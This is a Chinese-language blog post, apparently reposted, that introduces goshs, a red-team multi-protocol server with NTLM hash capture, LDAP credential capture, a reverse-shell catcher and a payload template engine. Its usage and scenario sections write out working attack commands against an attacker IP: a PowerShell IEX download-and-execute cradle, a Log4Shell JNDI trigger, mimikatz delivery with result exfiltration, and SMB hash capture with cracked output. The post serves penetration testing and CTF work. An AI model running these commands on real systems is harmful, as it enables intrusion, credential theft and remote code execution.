概述
goshs 是一个 Go 语言编写的单二进制文件服务器,专为红队作战、渗透测试和 CTF 场景设计。它远不止是一个文件服务器——它是一个集 HTTP/S、WebDAV、FTP/SFTP、SMB、LDAP/S、DNS、SMTP 于一体的多协议平台,内置 NTLM hash 捕获与破解、反弹 Shell 接收器、Payload 模板引擎等红队利器。
一句话定位:python3 -m http.server 的威力加强版,渗透测试者的瑞士军刀。
项目地址:https://github.com/goshs-labs/goshs 文档:https://docs.goshs.de 在线演示:https://demo.goshs.de
一、核心特性
协议矩阵
| 协议 | 支持 | 典型用途 |
|---|---|---|
| HTTP/HTTPS | ✅ | 文件分发、上传下载 |
| WebDAV | ✅ | 挂载为网络驱动器 |
| FTP/SFTP | ✅ | 传统文件传输 |
| SMB | ✅ | NTLM hash 捕获 |
| LDAP/LDAPS | ✅ | 凭据捕获 + JNDI Log4Shell |
| DNS | ✅ | 回调检测 |
| SMTP | ✅ | 邮件接收 |
| TFTP | ✅ | 轻量文件传输 |
红队特色功能
- NTLM hash 捕获:SMB 服务器自动捕获目标机器的 NTLMv2 hash,内置 wordlist 一键破解
- LDAP 凭据捕获:模拟 LDAP 服务器,捕获明文凭据 + NTLM hash,支持 JNDI 注入(Log4Shell)
- DNS 回调:捕获 DNS 查询,验证目标能否出网
- SMTP 开放中继:接收任意邮件,测试邮件网关
- Rev Shell Catcher:接收反弹 Shell 并自动生成 Payload
- Payload 模板引擎:
{{.LHOST}}/{{.LPORT}}自动填充,请求加?tpl即时渲染 - Share Links:基于 Token 的临时分享,支持下载次数/时间限制
- TTL 自毁:
--ttl 2h两小时后自动退出,不留痕迹
安全与认证
- Basic Auth(支持 bcrypt 散列)
- 证书双向认证
- IP 白名单
- 文件级 ACL
- TLS:自签名 / Let’s Encrypt / 自定义证书
其他功能
- 文件断点续传(HTTP Range)
- 拖拽上传、批量 ZIP 下载
- QR 码生成
- TUI 终端仪表盘
- Webhook 通知(Discord/Mattermost/Slack)
- localhost.run 隧道穿透
- mDNS 零配置发现
- JSON API
- 暗色/亮色主题切换
- 剪贴板共享
- 嵌入文件到二进制
二、安装方式
一键安装(推荐):
curl -sSfL https://goshs.de/install.sh | sh
Go 安装:
go install goshs.de/goshs/v2@latest
系统包管理器:
| 系统 | 命令 |
|---|---|
| Kali / Parrot | sudo apt install goshs |
| Arch Linux (AUR) | yay -S goshs-bin |
| BlackArch | pacman -S goshs |
| Alpine Linux | apk add goshs |
| Fedora / RHEL | dnf copr enable goshs-labs/goshs && dnf install goshs |
| Homebrew | brew install goshs |
| Scoop | scoop bucket add extras && scoop install extras/goshs |
| winget | winget install GoshsLabs.Goshs |
| Chocolatey | choco install goshs |
| Docker | docker run --rm -it -p 8000:8000 -v "$PWD:/pwd" goshs-labs/goshs:latest -d /pwd |
源码编译:
git clone https://github.com/goshs-labs/goshs.git
cd goshs
go build -o goshs .
三、详细用法
3.1 HTTP/HTTPS 文件服务器
# 最基本用法:当前目录,端口 8000
goshs
# 指定端口
goshs -p 8080
# 指定监听 IP 和目录
goshs -i 0.0.0.0 -p 8000 -d /var/www
# HTTPS 自签名证书
goshs -s -ss
# HTTPS 自定义证书
goshs -s -sk server.key -sc server.crt
# HTTPS Let's Encrypt 正式证书
goshs -s -sl -sle admin@example.com -sld goshs.example.com
# 只读模式
goshs -ro
# 只上传模式
goshs -uo -uf /path/to/upload
# 静默模式(不列出目录)
goshs -si
# 隐形模式(完全隐藏)
goshs -I
3.2 认证与权限
# Basic Auth
goshs -b 'admin:SuperSecret123'
# Basic Auth + bcrypt 散列密码
goshs -b 'admin:$2a$14$ydRJ//Ob4SctB/D7o.rvU.LmPs/vwXkeXCbtpCqzgOJDSShLgiY52'
# 空用户名 + 密码
goshs -b ':$up3r$3cur3'
# 证书双向认证
goshs -s -ca ca.crt -sk server.key -sc server.crt
# IP 白名单
goshs -ipw 192.168.1.100,10.10.10.5
# 启用 CLI(需同时启用 TLS 和 Auth)
goshs -b 'admin:pass' -s -ss -c
3.3 WebDAV
# 在 8001 端口启动 WebDAV
goshs -w
# 指定 WebDAV 端口
goshs -w -wp 8080
3.4 FTP/SFTP
# FTP 服务器
goshs -ftp -ftp-port 2121
# SFTP 服务器
goshs -ftp -ftp-sftp -ftp-port 2222
# SFTP 公钥认证
goshs -ftp -ftp-sftp -fkf ~/.ssh/authorized_keys
# SFTP 指定主机密钥
goshs -ftp -ftp-sftp -fhk /etc/ssh/ssh_host_ed25519_key
3.5 TFTP
goshs -tftp -tftp-port 69
3.6 SMB — NTLM Hash 捕获
# 捕获 SMB hash,需要 root 权限绑定 445 端口
sudo goshs -smb -smb-domain CORP
# 指定端口、域、共享名
sudo goshs -smb -smb-port 445 -smb-domain CORP -smb-share DATA
# 捕获后自动破解(需提供 wordlist)
sudo goshs -smb -smb-wordlist /usr/share/wordlists/rockyou.txt
攻击流程:
- 目标机器上执行
net use \\<攻击者IP>\goshs - goshs 捕获 NTLMv2 hash 并显示在控制台
- 自动/手动用 hashcat 或内置 wordlist 破解
3.7 LDAP — 凭据捕获
# LDAP 凭据捕获服务器
goshs -ldap
# LDAP + hash 破解
goshs -ldap -ldap-wordlist /usr/share/wordlists/rockyou.txt
# LDAPS(TLS)
goshs -s -ss -ldap
# JNDI 模式(Log4Shell 利用)
goshs -ldap -ldap-jndi -ldap-jndi-base http://10.10.14.7:8000
3.8 DNS 回调
# DNS 服务器,捕获查询
goshs -dns -dns-ip 10.10.14.7 -dns-port 53
# 需要 root 权限绑定 53 端口
sudo goshs -dns -dns-ip 10.10.14.7
3.9 SMTP 邮件接收
# 开放中继,接收邮件
goshs -smtp -smtp-port 2525 -smtp-domain your-domain.com
3.10 反弹 Shell 接收器
# 启动 Rev Shell Catcher
goshs -rc
# 自动生成 payload 页面,访问 http://<IP>:8000/ 即可看到
3.11 Payload 模板引擎
模板引擎是双重主动开启的:服务端需用
--template启用,客户端请求文件时还需显式加?tpl参数才会渲染。其余请求按原样返回文件。
# 启动模板渲染(--template 开启,--tpl-var 定义变量,可重复)
goshs -i 10.10.14.7 --template --tpl-var LPORT=4444
# 客户端请求加 ?tpl,服务端渲染 {{.LHOST}}/{{.LPORT}} 等变量
curl 'http://10.10.14.7:8000/rev.ps1?tpl'
# 不加 ?tpl 则返回原始文件(变量保持 {{.VAR}} 字面量)
curl 'http://10.10.14.7:8000/rev.ps1'
⚠️
?tpl只该指向文本类型的 payload——如果对恰好含{{的二进制文件开启渲染,会将其破坏。 ⚠️{{.LHOST}}未解析时(绑定0.0.0.0又没设--tpl-var LHOST)请求会直接报错,而不是静默输出空值。
支持的模板变量:
| 变量 | 来源 | 说明 |
|---|---|---|
{{.LHOST}} |
自动 | 绑定 -i 的单一 IP;0.0.0.0 时必须手动 --tpl-var LHOST=... |
{{.LPORT}} |
--tpl-var |
自定义,无默认值 |
{{.Proto}} |
自动 | http 或 https |
{{.Port}} |
自动 | goshs 的 Web 端口 |
{{.Host}} |
自动 | 绑定的 IP/接口 |
{{.YOURVAR}} |
--tpl-var |
任意自定义变量,--tpl-var YOURVAR=value |
--tpl-var的赋值优先级高于同名的内置变量。
3.12 Share Links(分享链接)
# 启动后通过 Web UI 操作
# 支持:Token 认证、下载次数限制、时间限制
goshs
3.13 TUI 交互式仪表盘
# 全屏终端仪表盘
goshs --tui
仪表盘包含:
- HTTP 请求实时日志
- DNS 查询记录
- SMB 捕获记录
- LDAP 捕获记录
- SMTP 邮件记录
- 反弹 Shell 视图
- 剪贴板面板
3.14 其他实用功能
# TTL 自毁(2 小时后退出)
goshs --ttl 2h
# Webhook 通知到 Discord
goshs -W -Wu https://discord.com/api/webhooks/xxx
# JSON 日志输出
goshs -o -V
# 配置文件启动
goshs -C /path/to/config.yaml
# 打印示例配置
goshs -P
# localhost.run 隧道穿透
goshs -t
# mDNS 零配置发现
goshs -m
# 更新到最新版
goshs --update
# 安装 Shell 自动补全
goshs --completion bash
goshs --completion fish
goshs --completion zsh
四、实战场景
场景 1:红队内网文件分发
# 攻击机启动 HTTPS 文件服务器,带认证
goshs -i 10.10.14.7 -s -ss -b 'redteam:P@ssw0rd!'
# 目标机下载工具
curl -k -u 'redteam:P@ssw0rd!' https://10.10.14.7:8000/mimikatz.exe -o mimikatz.exe
# 或浏览器访问上传回显数据
# 目标 POST 上传
curl -k -u 'redteam:P@ssw0rd!' -F 'file=@result.txt' https://10.10.14.7:8000/
场景 2:SMB Relay / Hash 捕获
# 攻击机
sudo goshs -smb -smb-domain CORP -smb-wordlist rockyou.txt
# 目标执行
net use \\10.10.14.7\goshs
# 控制台输出:
# [+] SMB NTLMv2 hash captured for CORP\\Administrator
# [+] Hash: Administrator::CORP:1122334455667788:...snip...
# [+] Attempting to crack with rockyou.txt...
# [+] Password found: P@ssw0rd123!
场景 3:Payload 模板分发
# 攻击机:创建含模板变量的 payload 文件
echo 'powershell -NoP -NonI -W Hidden -Exec Bypass -C "IEX(New-Object Net.WebClient).downloadString(''http://{{.LHOST}}:{{.LPORT}}/shell.ps1'')"' > rev.ps1
# 启动模板渲染服务
goshs -i 10.10.14.7 --template --tpl-var LPORT=4444
# 目标执行(加 ?tpl 触发渲染,自动填充 LHOST 和 LPORT)
powershell -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7:8000/rev.ps1?tpl')"
场景 4:Log4Shell 利用
# 启动 LDAP JNDI 服务器
goshs -ldap -ldap-jndi -ldap-jndi-base http://10.10.14.7:8000/
# 启动 HTTP 服务器提供恶意类
goshs -d /path/to/exploit-classes
# 目标触发
${jndi:ldap://10.10.14.7:389/Exploit}
场景 5:内网穿透 + 远程文件服务器
# 通过 localhost.run 隧道暴露到公网
goshs -i 127.0.0.1 -p 8000 -t
# 输出会显示一个 public URL,如
# https://random-name.lhr.life
五、与同类工具对比
| 特性 | goshs | python3 -m http.server | updog | impacket-smbserver |
|---|---|---|---|---|
| HTTPS | ✅ | ❌ | ✅ | ❌ |
| 多协议 | ✅ HTTP/S/FTP/SMB/LDAP/DNS/SMTP | ❌ | ❌ | ❌ SMB only |
| SMB Hash 捕获 | ✅ 内置破解 | ❌ | ❌ | ✅ 无破解 |
| LDAP 捕获 | ✅ JNDI 模式 | ❌ | ❌ | ❌ |
| Payload 模板 | ✅ | ❌ | ❌ | ❌ |
| Rev Shell Catcher | ✅ | ❌ | ❌ | ❌ |
| TUI 仪表盘 | ✅ | ❌ | ❌ | ❌ |
| Share Links | ✅ | ❌ | ❌ | ❌ |
| 单二进制 | ✅ | ❌ | ❌ | ❌ |
| 跨平台 | ✅ | ✅ | ✅ | ✅ |
| WebDAV | ✅ | ❌ | ❌ | ❌ |
六、总结
goshs 是目前红队场景下最全面的单二进制文件服务器。它的核心优势在于:
- 一体集成:一个二进制替代 HTTP/S、FTP/SFTP、SMB、LDAP、DNS、SMTP 多个工具
- 红队原生:NTLM hash 捕获、LDAP 凭据窃取、反弹 Shell 接收、Payload 模板——都是渗透测试的刚需
- 部署极简:单文件,零依赖,curl 一键安装
- 操作友好:TUI 仪表盘、Web UI、CLI 三种操作界面
- 安全可控:TTL 自毁、IP 白名单、多种认证方式
无论是渗透测试、CTF 比赛,还是日常开发调试,goshs 都是一个值得常备 toolbox 的工具。
原文 https://blog.csdn.net/2301_79518550/article/details/163566263